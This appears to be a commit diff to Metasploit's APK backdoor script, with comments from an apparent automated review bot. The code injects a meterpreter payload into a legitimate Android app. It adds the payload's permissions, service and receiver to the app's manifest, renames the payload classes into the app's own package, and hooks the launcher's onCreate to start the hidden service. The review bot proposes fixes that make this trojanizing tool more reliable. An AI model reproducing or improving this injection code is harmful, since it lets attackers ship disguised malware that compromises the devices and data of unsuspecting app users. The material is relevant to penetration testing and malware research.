Land #7362, Fix apk injection script to include android payload service and broadcast receivers
commit
e5ac3eda61
|
@ -8,14 +8,7 @@ require 'fileutils'
|
|||
require 'optparse'
|
||||
require 'open3'
|
||||
|
||||
module Msf::Payload::Apk
|
||||
|
||||
class ApkBackdoor
|
||||
include Msf::Payload::Apk
|
||||
def backdoor_apk(apk, payload)
|
||||
backdoor_payload(apk, payload)
|
||||
end
|
||||
end
|
||||
class Msf::Payload::Apk
|
||||
|
||||
def print_status(msg='')
|
||||
$stderr.puts "[*] #{msg}"
|
||||
|
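Review bot: Changing `module Msf::Payload::Apk` to `class Msf::Payload::Apk` is an interface change, not just a cleanup: Ruby raises TypeError when a class is passed to `include`, so any caller outside this diff that still does `include Msf::Payload::Apk` breaks at load time (the hunk removes the only include it shows, the ApkBackdoor one, so this is only a risk if other includers exist). The class also has no documentation at its definition; a header such as `# Injects a Metasploit Android payload into an APK template by rewriting its manifest and launcher activity.` would give readers the purpose the commit title implies.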
@ -65,62 +58,45 @@ module Msf::Payload::Apk
|
|||
end
|
||||
end
|
||||
|
||||
def fix_manifest(tempdir)
|
||||
payload_permissions=[]
|
||||
|
||||
#Load payload's permissions
|
||||
File.open("#{tempdir}/payload/AndroidManifest.xml","rb"){|file|
|
||||
k=File.read(file)
|
||||
payload_manifest=Nokogiri::XML(k)
|
||||
permissions = payload_manifest.xpath("//manifest/uses-permission")
|
||||
for permission in permissions
|
||||
name=permission.attribute("name")
|
||||
payload_permissions << name.to_s
|
||||
end
|
||||
def parse_manifest(manifest_file)
|
||||
File.open(manifest_file, "rb"){|file|
|
||||
data = File.read(file)
|
||||
return Nokogiri::XML(data)
|
||||
}
|
||||
|
||||
original_permissions=[]
|
||||
apk_mani=""
|
||||
|
||||
#Load original apk's permissions
|
||||
File.open("#{tempdir}/original/AndroidManifest.xml","rb"){|file2|
|
||||
k=File.read(file2)
|
||||
apk_mani=k
|
||||
original_manifest=Nokogiri::XML(k)
|
||||
permissions = original_manifest.xpath("//manifest/uses-permission")
|
||||
for permission in permissions
|
||||
name=permission.attribute("name")
|
||||
original_permissions << name.to_s
|
||||
end
|
||||
}
|
||||
|
||||
#Get permissions that are not in original APK
|
||||
add_permissions=[]
|
||||
for permission in payload_permissions
|
||||
if !(original_permissions.include? permission)
|
||||
print_status("Adding #{permission}")
|
||||
add_permissions << permission
|
||||
end
|
||||
end
|
||||
|
||||
inject=0
|
||||
new_mani=""
|
||||
#Inject permissions in original APK's manifest
|
||||
for line in apk_mani.split("\n")
|
||||
if (line.include? "uses-permission" and inject==0)
|
||||
for permission in add_permissions
|
||||
new_mani << '<uses-permission android:name="'+permission+'"/>'+"\n"
|
||||
end
|
||||
new_mani << line+"\n"
|
||||
inject=1
|
||||
else
|
||||
new_mani << line+"\n"
|
||||
end
|
||||
end
|
||||
File.open("#{tempdir}/original/AndroidManifest.xml", "wb") {|file| file.puts new_mani }
|
||||
end
|
||||
|
||||
def backdoor_payload(apkfile, raw_payload)
|
||||
def fix_manifest(tempdir)
|
||||
#Load payload's manifest
|
||||
payload_manifest = parse_manifest("#{tempdir}/payload/AndroidManifest.xml")
|
||||
payload_permissions = payload_manifest.xpath("//manifest/uses-permission")
|
||||
|
||||
#Load original apk's manifest
|
||||
original_manifest = parse_manifest("#{tempdir}/original/AndroidManifest.xml")
|
||||
original_permissions = original_manifest.xpath("//manifest/uses-permission")
|
||||
|
||||
manifest = original_manifest.xpath('/manifest')
|
||||
old_permissions = []
|
||||
for permission in original_permissions
|
||||
name = permission.attribute("name").to_s
|
||||
old_permissions << name
|
||||
end
|
||||
for permission in payload_permissions
|
||||
name = permission.attribute("name").to_s
|
||||
unless old_permissions.include?(name)
|
||||
print_status("Adding #{name}")
|
||||
original_permissions.before(permission.to_xml)
|
||||
end
|
||||
end
|
||||
|
||||
application = original_manifest.at_xpath('/manifest/application')
|
||||
application << payload_manifest.at_xpath('/manifest/application/receiver').to_xml
|
||||
application << payload_manifest.at_xpath('/manifest/application/service').to_xml
|
||||
|
||||
File.open("#{tempdir}/original/AndroidManifest.xml", "wb") {|file| file.puts original_manifest.to_xml }
|
||||
end
|
||||
|
||||
def backdoor_apk(apkfile, raw_payload)
|
||||
|
||||
unless apkfile && File.readable?(apkfile)
|
||||
usage
|
||||
raise RuntimeError, "Invalid template: #{apkfile}"
|
||||
|
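Review bot: The receiver and service injection at the end of the new fix_manifest copies only the first match of each, because `at_xpath` returns a single node, and it raises NoMethodError on `nil.to_xml` when the payload manifest declares no `<receiver>` or `<service>`; `application` is likewise nil when the template manifest has no `<application>` element. Iterating over an XPath union and guarding the application node handles payloads with several receivers (which the commit title announces) and fails with a clear message otherwise. The `original_permissions.before(permission.to_xml)` call in the permission loop presumably also raises when the template declares no `uses-permission` at all, since a NodeSet's `before` delegates to its first node — appending to the `manifest` node that is already looked up but unused would avoid that. In parse_manifest, `File.open(manifest_file, "rb") { |file| Nokogiri::XML(file) }` does the same job without the extra `File.read` and block `return`.
```ruby
    application = original_manifest.at_xpath('/manifest/application')
    raise RuntimeError, "Unable to find <application> in the template manifest" unless application
    payload_manifest.xpath('/manifest/application/receiver | /manifest/application/service').each do |node|
      application << node.to_xml
    end
    # … unchanged: write original_manifest back to the template manifest file …
```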
@ -168,9 +144,7 @@ module Msf::Payload::Apk
|
|||
print_status "Decompiling payload APK..\n"
|
||||
run_cmd("apktool d #{tempdir}/payload.apk -o #{tempdir}/payload")
|
||||
|
||||
f = File.open("#{tempdir}/original/AndroidManifest.xml")
|
||||
amanifest = Nokogiri::XML(f)
|
||||
f.close
|
||||
amanifest = parse_manifest("#{tempdir}/original/AndroidManifest.xml")
|
||||
|
||||
print_status "Locating hook point..\n"
|
||||
launcheractivity = find_launcher_activity(amanifest)
|
||||
|
@ -194,15 +168,33 @@ module Msf::Payload::Apk
|
|||
raise RuntimeError, "Unable to find onCreate() in #{smalifile}\n"
|
||||
end
|
||||
|
||||
print_status "Copying payload files..\n"
|
||||
FileUtils.mkdir_p("#{tempdir}/original/smali/com/metasploit/stage/")
|
||||
FileUtils.cp Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/Payload*.smali"), "#{tempdir}/original/smali/com/metasploit/stage/"
|
||||
# Remove unused files
|
||||
FileUtils.rm "#{tempdir}/payload/smali/com/metasploit/stage/MainActivity.smali"
|
||||
FileUtils.rm Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/R*.smali")
|
||||
|
||||
payloadhook = entrypoint + "\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V"
|
||||
package = amanifest.xpath("//manifest").first['package']
|
||||
package_slash = package.gsub(/\./, "/")
|
||||
print_status "Adding payload as package #{package}\n"
|
||||
payload_files = Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/*.smali")
|
||||
payload_dir = "#{tempdir}/original/smali/#{package_slash}/"
|
||||
FileUtils.mkdir_p payload_dir
|
||||
|
||||
# Copy over the payload files, fixing up the smali code
|
||||
payload_files.each do |file_name|
|
||||
smali = File.read(file_name)
|
||||
newsmali = smali.gsub(/com\/metasploit\/stage/, package_slash)
|
||||
newfilename = "#{payload_dir}#{File.basename file_name}"
|
||||
File.open(newfilename, "wb") {|file| file.puts newsmali }
|
||||
end
|
||||
|
||||
payloadhook = entrypoint + %Q^
|
||||
invoke-static {p0}, L#{package_slash}/MainService;->startService(Landroid/content/Context;)V
|
||||
^
|
||||
hookedsmali = activitysmali.gsub(entrypoint, payloadhook)
|
||||
|
||||
print_status "Loading #{smalifile} and injecting payload..\n"
|
||||
File.open(smalifile, "wb") {|file| file.puts hookedsmali }
|
||||
|
||||
injected_apk = "#{tempdir}/output.apk"
|
||||
aligned_apk = "#{tempdir}/aligned.apk"
|
||||
print_status "Poisoning the manifest with meterpreter permissions..\n"
|
||||
|
|
|
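Review bot: `package = amanifest.xpath("//manifest").first['package']` raises NoMethodError on nil when the template manifest has no `<manifest>` root, and the value it yields is interpolated unchecked into the `payload_dir` path passed to `FileUtils.mkdir_p` and into the `gsub` replacement applied to every payload smali file. Validating it once against the Android package-name shape gives a clear failure instead: `manifest_node = amanifest.at_xpath('/manifest')`, `package = manifest_node && manifest_node['package']`, `raise RuntimeError, "Invalid package name in template manifest: #{package.inspect}" unless package =~ /\A[A-Za-z_][A-Za-z0-9_.]*\z/`. On style, `package.tr('.', '/')` is the idiomatic form of `package.gsub(/\./, "/")`. The enclosing backdoor_apk method starts and ends outside this hunk.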
@ -320,7 +320,7 @@ module Msf
|
|||
gen_payload = raw_payload
|
||||
elsif payload.start_with? "android/" and not template.blank?
|
||||
cli_print "Using APK template: #{template}"
|
||||
apk_backdoor = ::Msf::Payload::Apk::ApkBackdoor::new()
|
||||
apk_backdoor = ::Msf::Payload::Apk.new
|
||||
raw_payload = apk_backdoor.backdoor_apk(template, generate_raw_payload)
|
||||
cli_print "Payload size: #{raw_payload.length} bytes"
|
||||
gen_payload = raw_payload
|
||||
|
|